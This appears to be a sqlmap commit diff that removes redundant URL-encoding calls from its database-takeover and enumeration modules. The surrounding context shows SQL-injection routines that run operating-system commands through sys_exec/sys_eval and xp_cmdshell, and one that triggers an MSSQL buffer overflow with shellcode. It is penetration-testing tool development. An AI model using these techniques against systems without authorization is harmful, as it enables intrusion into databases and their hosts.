Delegate urlencoding to agent.py only

2024-11-22 09:36:35 +03:00 · 2010-10-31 13:28:05 +00:00 · 2010-10-31 13:28:05 +00:00 · 65a0a8d285
commit 65a0a8d285
parent 17e8abe841
5 changed files with 0 additions and 12 deletions
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@ -12,7 +12,6 @@ import os
 from lib.core.agent import agent
 from lib.core.common import dataToStdout
 from lib.core.common import readInput
-from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@ -80,7 +79,6 @@ class UDF:
            udfName = "sys_exec"

        cmd = unescaper.unescape(cmd)
-        cmd = urlencode(cmd, convall=True)

        inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)

@ -90,7 +88,6 @@ class UDF:
            udfName = "sys_eval"

        cmd = unescaper.unescape(cmd)
-        cmd = urlencode(cmd, convall=True)

        inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last)
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -9,7 +9,6 @@ See the file 'doc/COPYING' for copying permission

 from lib.core.common import randomStr
 from lib.core.common import readInput
-from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@ -98,7 +97,6 @@ class xp_cmdshell:

    def xpCmdshellForgeCmd(self, cmd):
        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
-        forgedCmd = urlencode(forgedCmd, convall=True)

        return forgedCmd

--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@ -14,7 +14,6 @@ import os
 from lib.core.common import getRange
 from lib.core.common import posixToNtSlashes
 from lib.core.common import randomStr
-from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@ -89,7 +88,6 @@ class Filesystem(GenericFilesystem):
        """ % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)

        binToHexQuery = binToHexQuery.replace("    ", "").replace("\n", " ")
-        binToHexQuery = urlencode(binToHexQuery, convall=True)
        inject.goStacked(binToHexQuery)

        if kb.unionPosition is not None:
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@ -9,7 +9,6 @@ See the file 'doc/COPYING' for copying permission

 import binascii

-from lib.core.convert import urlencode
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapUnsupportedFeatureException
@ -143,7 +142,6 @@ class Takeover(GenericTakeover):
        """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)

        self.spExploit = self.spExploit.replace("    ", "").replace("\n", " ")
-        self.spExploit = urlencode(self.spExploit, convall=True)

        logger.info("triggering the buffer overflow vulnerability, wait..")
        inject.goStacked(self.spExploit, silent=True)
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@ -24,7 +24,6 @@ from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import safeStringFormat
 from lib.core.common import strToHex
-from lib.core.convert import urlencode
 from lib.core.convert import utf8decode
 from lib.core.data import conf
 from lib.core.data import kb
@ -1731,8 +1730,6 @@ class Enumeration:

            return output
        else:
-            query = urlencode(query, convall=True)
-
            if kb.stackedTest is None:
                stackedTest()